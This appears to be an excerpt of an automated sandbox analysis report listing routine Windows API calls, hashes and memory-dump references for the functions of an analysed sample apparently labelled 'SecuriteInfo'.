• Instruction ID: b53e8d5df10ed753aa24c7d31007a21951d54f5e52394d648033905760c56dbc
• Instruction Fuzzy Hash: 62510671A00615AFDB14DFA8C884B9AFBA4FF45714F14467AE914DB381DB38AD01CBA4
Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(00000000), ref: 004B2091
• EndDialog.USER32(00000000,00000001), ref: 004B20A0
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: DialogWindow
• String ID: |^[
• API String ID: 2634769047-2049683584
• Opcode ID: fb68f995acdf0ce6cfd5910930a4f5dd4fa3e6a7325073d50214a38eea7b6ab2
• Instruction ID: b66c4c33feab126d42590fb6b2ae9c647250eb89e6434c585c9c69c20cc0e6b2
• Instruction Fuzzy Hash: A0518B30901745DFD721CF68CA48B8AFBF5FF49310F14869AE4459B3A1D774AA04CBA1
Uniqueness Score: -1.00%

APIs
• LCMapStringEx.KERNEL32(?,0053A2DA,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00539F8C
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,0053A2DA,?,?,00000000,?,00000000), ref: 00539FAA
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: String
• String ID: `{5
• API String ID: 2568140703-770602540
• Opcode ID: a6418106bdd8f3cbbc0a81bd21f140e620c4ac3a14ae4e816c801beffad24d38
• Instruction ID: 23a0e91c08e4be806e3fe59bd9cba0af43deabc905ca172c2c71dce6a856bc0b
• Instruction Fuzzy Hash: 8CF0683640411ABBCF125F90DC09AEE7F26FF88360F094110FA1865020CA76D871AB95
Uniqueness Score: -1.00%

APIs
• FlsAlloc.KERNEL32(?,00521BB6,00521AB9,00523D4F), ref: 00524C85
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc$`{5
• API String ID: 2773662609-995052927
• Opcode ID: 271b7b46a40f1ae581548677b33e67fc1c434a3191234b00d8d3d41733c5abdd
• Instruction ID: e209f87ec2739df346524d6744e7f735a8ccf7456c7b9810a7d9ea387726936b
• Instruction Fuzzy Hash: 6DD0123168563477CA1176946C06BBE7F5CFF42BA2F040165F94865192996248105AC5
Uniqueness Score: -1.00%

APIs
• __freea.LIBCMT ref: 0053A39B
  • Part of subcall function 00538247: RtlAllocateHeap.NTDLL(00000000,00000000,00535FF3,?,0053A198,?,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538279
• __freea.LIBCMT ref: 0053A3B0
• __freea.LIBCMT ref: 0053A3C0
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: __freea$AllocateHeap
• API String ID: 2243444508-0
• Opcode ID: 8cad3b048d11ab998cdb93ef3c10b939a70d75a004d5f55028c9d85a93e0de85
• Instruction ID: 0c334c00ca4fd436727d52d21d9560676e64c510833349f120932eb07a9d8979
• Instruction Fuzzy Hash: 7551BEB260021AAFEB259EA5DC85EBF3FA9FF84750F150928FD48D6151EB31CC508762
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNEL32(?,?,?,00000000,D13B3340,?,?), ref: 00491F67
• ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 00492074
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: File$PointerRead
• API String ID: 3154509469-0
• Opcode ID: 9f3c68bc3c1fcb334249cbc7be6e5be2ed9e198c07cd767f9bda29c0d9e46c92
• Instruction ID: a3f4eb64f39135bb668a4341f4e353b6e232f5de2de837c28755195aa249b040
• Instruction Fuzzy Hash: 7F616171D00609AFDB04DFA8D945B9DFBB4FF09320F10836AE925A7390EB75A904CB95
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,D13B3340,?,00000000,?,80004005,?,00000000), ref: 0048F35E
• GetLastError.KERNEL32 ref: 0048F396
• GetLastError.KERNEL32(?), ref: 0048F42F
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLast$CreateFile
• API String ID: 1722934493-0
• Opcode ID: 8364d545a0bf0241f1e81637ec259b7a25bf207ef48c4cf5d65d8791ead41f1a
• Instruction ID: 364be1e6f00d1f18464da6d793cb3e8a9d04e86fd5a1363b37d5c7b7a991456d
• Instruction Fuzzy Hash: 0E51E231A006059FDB10EF69D845BAFF7B1FF54720F10866EE919973A0EB34A908CB84
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,D13B3340,?,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051FB03
• HeapFree.KERNEL32(00000000,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051FB0A
  • Part of subcall function 0051F977: GetProcessHeap.KERNEL32(00000000,D13B3340,?,0051FADD,?,?,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051F98F
  • Part of subcall function 0051F977: HeapFree.KERNEL32(00000000,?,0051FADD,?,?,?,004B2007,00000000,D13B3340,?,004B2142), ref: 0051F996
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID: `{5
• API String ID: 3859560861-770602540
• Opcode ID: ca10872eca6fbc39c664d7bae49cc0b196ded1d01403dac4aa8d00d6c5fc300b
• Instruction ID: 72ef890ac76fd2802c3d34360f6de250c555aff14432652a7b64d5f6b32a6a68
• Instruction Fuzzy Hash: 16F0A732104601ABE6312B54EC1DFEB7FA9FFC1B61F154439F509421A09F74A8C4D7A1
Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 0048E389
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0058D0D0,000000FF), ref: 0048E398
• IsWindow.USER32(?), ref: 0048E3C5
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: Window$CurrentDestroyThread
• API String ID: 2303547079-0
• Opcode ID: f18e469cc7b36758fd47a09a8f60acb2c5536e38e2177b3217a895c5fbf43bfe
• Instruction ID: 796744155048348cb0ab1ca2b55b1e634dbe76a872dd85c481f34ccfc9920588
• Instruction Fuzzy Hash: CAF08271109B409AD774AB2AEE08B47BBD5BB48B10F051D0EE48696A90C7B4F840CB68
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
  • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
  • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,D13B3340), ref: 0046D500
  • Part of subcall function 0046D5C0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,?,?,80004005), ref: 0046D5CD
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: Init_thread_footer$EnvironmentFolderHeapPathProcessSpecialVariable
• String ID: USERPROFILE
• API String ID: 1777821646-2419442777
• Opcode ID: c7581c4b36dcaf245fe3180b1f1e35ece27baf5784f7f439c33c115b9b9332e0
• Instruction ID: c79f1c271d21de18b5890afa8dd20fdf9ea75243c318ad2c778015efcd1e82f8
• Instruction Fuzzy Hash: C761BE70E006099FDB14DF68C859BAEB7B4FF44314F10826EE8169B391EB34AD04CB96
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
  • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
• __Init_thread_footer.LIBCMT ref: 004521E2
  • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
  • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
  • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
Memory Dump Source
• Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
• String ID: oZg
• API String ID: 2296764815-793252906
• Opcode ID: c60450dbe023b194cbb6990eee58969569901934cf5d8d2e76317653f150699a
• Instruction ID: de0558e408181cee5650a8c0fb1865fa6608fa0d5f54ecd7732320193ee9e1c7
• Instruction Fuzzy Hash: 7101D4B1A04604DBD710DF58ED4AB0977B1FB09720F10573AE916837D1DB36AD00CA55
Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051C943
                                                      • Part of subcall function 0051D43D: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0051D448
                                                      • Part of subcall function 0051D43D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051D4B0
                                                      • Part of subcall function 0051D43D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051D4C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                    • String ID: uc
                                                    • API String ID: 697777088-1107239587
                                                    • Opcode ID: a56fd07b8a20ec575c4ee76b1888e78304425599ac7a44cea56ab078897364d0
                                                    • Instruction ID: 64f1f450ef2a201fc4056a6afc6a757178a2b6112f3d30007a04f2e7f0c7a4a5
                                                    • Opcode Fuzzy Hash: a56fd07b8a20ec575c4ee76b1888e78304425599ac7a44cea56ab078897364d0
                                                    • Instruction Fuzzy Hash: F6B012C339E0157C7508532D7C06C760D6DE0C0F20730843BF404C0440E9C12C800871
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0053FACA: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 0053FAF5
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,0053FDE1,?,00000000,?,?,?), ref: 0053FFFE
                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0053FDE1,?,00000000,?,?,?), ref: 00540040
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID:
                                                    • API String ID: 546120528-0
                                                    • Opcode ID: 28546f1018bcc136b8db42c8c06e8e5205e4def342921d9e5e7ba3b25025115b
                                                    • Instruction ID: 6683e8b58cbf2bf8f22b4416ac76a939d97e4db3688f506b0f32f5de0c253f9c
                                                    • Opcode Fuzzy Hash: 28546f1018bcc136b8db42c8c06e8e5205e4def342921d9e5e7ba3b25025115b
                                                    • Instruction Fuzzy Hash: 0B510270A003459EDB21CF35C884BEAFFF5FF95308F28646ED29A87291D6749946CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32(0048DAE1), ref: 0048E180
                                                    • DestroyWindow.USER32(00000000,?,00000000), ref: 0048E237
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DestroyErrorLastWindow
                                                    • String ID:
                                                    • API String ID: 1182162058-0
                                                    • Opcode ID: 429e761198a4b599996e37dac660fc5ebee3633dd58f65e9f49d814f5ac445ec
                                                    • Instruction ID: 3592cd89a99e0506c3bfc30304be2a0c45cddc92c86446657c59a12fb85352eb
                                                    • Opcode Fuzzy Hash: 429e761198a4b599996e37dac660fc5ebee3633dd58f65e9f49d814f5ac445ec
                                                    • Instruction Fuzzy Hash: B221E4B26001099BD720AF09EC05BAB7799EB54320F004667FD04CB791DBB9EC64DBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0046FF30: LoadLibraryW.KERNEL32(ComCtl32.dll,D13B3340,?,?,00000000), ref: 0046FF6E
                                                      • Part of subcall function 0046FF30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 0046FF91
                                                      • Part of subcall function 0046FF30: FreeLibrary.KERNEL32(00000000), ref: 0047000F
                                                    • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00470964
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0047096F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryMessageSend$AddressFreeLoadProc
                                                    • String ID:
                                                    • API String ID: 3032493519-0
                                                    • Opcode ID: 4bf1d5f96a9c5e656d8fd8c2b56e78c05e25ff1e05c43ebb0e25a95565381877
                                                    • Instruction ID: 168c434457a1afb87605c37dbf6aa2e2248c3e4ca8b980899b290bcb3c7403e1
                                                    • Opcode Fuzzy Hash: 4bf1d5f96a9c5e656d8fd8c2b56e78c05e25ff1e05c43ebb0e25a95565381877
                                                    • Instruction Fuzzy Hash: 4DF0A03279521837F624215A1C03F27B64DD781B68F10427BFA88AB2C2ECC63C0502D9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 00538223
                                                    • GetLastError.KERNEL32(?,?,0053A1A9,00000000,00535FF3,00000000,?,00529D85,00000000,00535FF3,?,?,?,?,00535DED), ref: 0053822E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: ad3e469761820f839048997a1c1c427244e1ec92d678e60b03e9f4bb2d270fb0
                                                    • Instruction ID: 0a9ad2783199ef4cb14f0184b2249c81d56d189bcf0f305a96dfb46d8595ec8d
                                                    • Opcode Fuzzy Hash: ad3e469761820f839048997a1c1c427244e1ec92d678e60b03e9f4bb2d270fb0
                                                    • Instruction Fuzzy Hash: 1DE08C32100B24AFCB152FB5BC0CBBA7F99BF42391F104020F608871A0EF70989497A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00524C57: FlsAlloc.KERNEL32(?,00521BB6,00521AB9,00523D4F), ref: 00524C85
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00521BCA
                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00521BD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocValue___vcrt____vcrt_uninitialize_ptd
                                                    • String ID:
                                                    • API String ID: 1208342256-0
                                                    • Opcode ID: 1106db3dec2b25403c582c27f6fef55cdff6728e5db7cf178220e06c38ea3a66
                                                    • Instruction ID: bb88e0c77375686d46c2713367a2ad1372c8df9b2bcd6c324c07733681dfefb7
                                                    • Opcode Fuzzy Hash: 1106db3dec2b25403c582c27f6fef55cdff6728e5db7cf178220e06c38ea3a66
                                                    • Instruction Fuzzy Hash: 14D0A926148F320C8D1827B4380A49B2EAABCB37B0BA01A4AF020A61C2FF1984416959
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0051F85E
                                                    • RtlEncodePointer.NTDLL(00000000,?,0051F7E8,00000000,AtlThunk_AllocateData,00637D78,?,0051FB44,00637D7C,?,00000000,?,00495F5C,?,00000000,00000000), ref: 0051F86D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressEncodePointerProc
                                                    • String ID:
                                                    • API String ID: 1846120836-0
                                                    • Opcode ID: 7c4fa8bd3b3b93ce24ae6072c69bf39d325288fca61eb852685b85de1e111488
                                                    • Instruction ID: ecdb94088ca15837eaf5b034e46ce161bbc1e5215475c705a58a91a4801aec23
                                                    • Opcode Fuzzy Hash: 7c4fa8bd3b3b93ce24ae6072c69bf39d325288fca61eb852685b85de1e111488
                                                    • Instruction Fuzzy Hash: E6D09279540308AB8F015FA6EC089EA3BA9BF5A7657008064F91D86620EB329466AB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 626452242-0
                                                    • Opcode ID: 773adce2a9d801cde503944c79f29ca08cff23d7e9641058a2328bfabaaf98a0
                                                    • Instruction ID: e29de55a8b672018bbf1ad90450c79879b05b3750671d26e1cfff70d8dc03595
                                                    • Opcode Fuzzy Hash: 773adce2a9d801cde503944c79f29ca08cff23d7e9641058a2328bfabaaf98a0
                                                    • Instruction Fuzzy Hash: C501D635301111AFD6119B59DC89F6EB759EF95322F20422EFB149B3D1CE606C069794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCPInfo.KERNEL32(E8458D00,?,0053FDED,0053FDE1,00000000), ref: 0053FBD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID:
                                                    • API String ID: 1807457897-0
                                                    • Opcode ID: bc54a1ddea7e3d52042b13918276ba30cf097af290eab046b346aa4c2c99abba
                                                    • Instruction ID: e54882744ad652f40e492232944cd40db5407c73959c02de59a2a8fdab940f72
                                                    • Opcode Fuzzy Hash: bc54a1ddea7e3d52042b13918276ba30cf097af290eab046b346aa4c2c99abba
                                                    • Instruction Fuzzy Hash: 79512771D0825C9BDB218B28DD84AEA7FB8FB55304F2409FDE59AD7182C335AD46DB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00471DA0: __Init_thread_footer.LIBCMT ref: 00471E16
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • __Init_thread_footer.LIBCMT ref: 00471C10
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                    • String ID:
                                                    • API String ID: 984842325-0
                                                    • Opcode ID: dbb035cffbcceffd9d3f3295611b9db7d38052395f946ddf3ee97db23906b561
                                                    • Instruction ID: cacf260477999a2fccb4ace7fd78111e83f311475e9521ca09f03cd70ed32233
                                                    • Opcode Fuzzy Hash: dbb035cffbcceffd9d3f3295611b9db7d38052395f946ddf3ee97db23906b561
                                                    • Instruction Fuzzy Hash: 3531F571584604DFE725DF48ED82BCD77A2FB01714F20661AE4295B7E0DB7A68008FA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
